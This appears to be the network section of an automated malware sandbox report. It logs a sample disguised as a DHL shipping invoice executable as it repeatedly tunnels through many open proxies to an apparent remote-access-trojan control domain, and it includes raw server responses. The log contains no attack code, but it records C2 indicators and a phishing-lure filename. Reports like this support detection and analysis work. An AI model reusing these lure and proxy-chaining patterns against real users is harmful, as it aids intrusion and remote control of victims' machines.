                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.268255949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:19.281312943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1874192.168.2.45355454.36.122.16397136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.194015980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250149012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250240088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.250500917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.249862909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:43.252240896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.270056963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:19.285202980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1875192.168.2.455497212.127.93.18580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.195547104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1876192.168.2.45477537.32.98.160438136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.210916042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250180006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250181913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.250555992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1877192.168.2.455464219.243.212.11810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.211457968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1878192.168.2.455488222.255.238.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.216913939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.545697927 CET481INHTTP/1.1 302 Found
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Location: https://ktxcomay.com.vn
                            Content-Length: 289
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1879192.168.2.454745107.148.201.157806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.236620903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.250232935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1880192.168.2.45554938.162.17.6331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.236816883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.577107906 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1881192.168.2.455467203.95.196.580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.286048889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1882192.168.2.455462203.95.198.14680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.288883924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.062575102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1883192.168.2.45111045.238.57.136296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.290273905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1884192.168.2.455496221.153.92.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.310996056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1885192.168.2.455524217.27.149.19041536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.310997963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1886192.168.2.45482998.103.88.158461046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.316138029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1887192.168.2.455551186.97.172.178600806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.326530933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.952922106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453562975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.453294992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453270912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.429356098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.344062090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.047063112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.424937010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1888192.168.2.455490123.57.236.13988996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.328149080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1889192.168.2.4555405.75.192.13806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.333497047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.506112099 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1890192.168.2.45485245.11.95.16560046484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.336545944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953277111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563364983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750190973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1891192.168.2.455552104.244.75.78315346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.336545944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1892192.168.2.453620107.180.95.17714056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.347744942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453169107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.547137022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.640768051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.640420914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.656018972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:43.656081915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1893192.168.2.45549947.56.110.20489896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.350281000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1894192.168.2.454737103.156.232.8931256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.351629019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1895192.168.2.454817217.112.80.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.352432013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.509151936 CET857INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                            Content-Length: 640
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6d 20 50 48 50 2f 37 2e 34 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1896192.168.2.455472120.197.40.21990026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
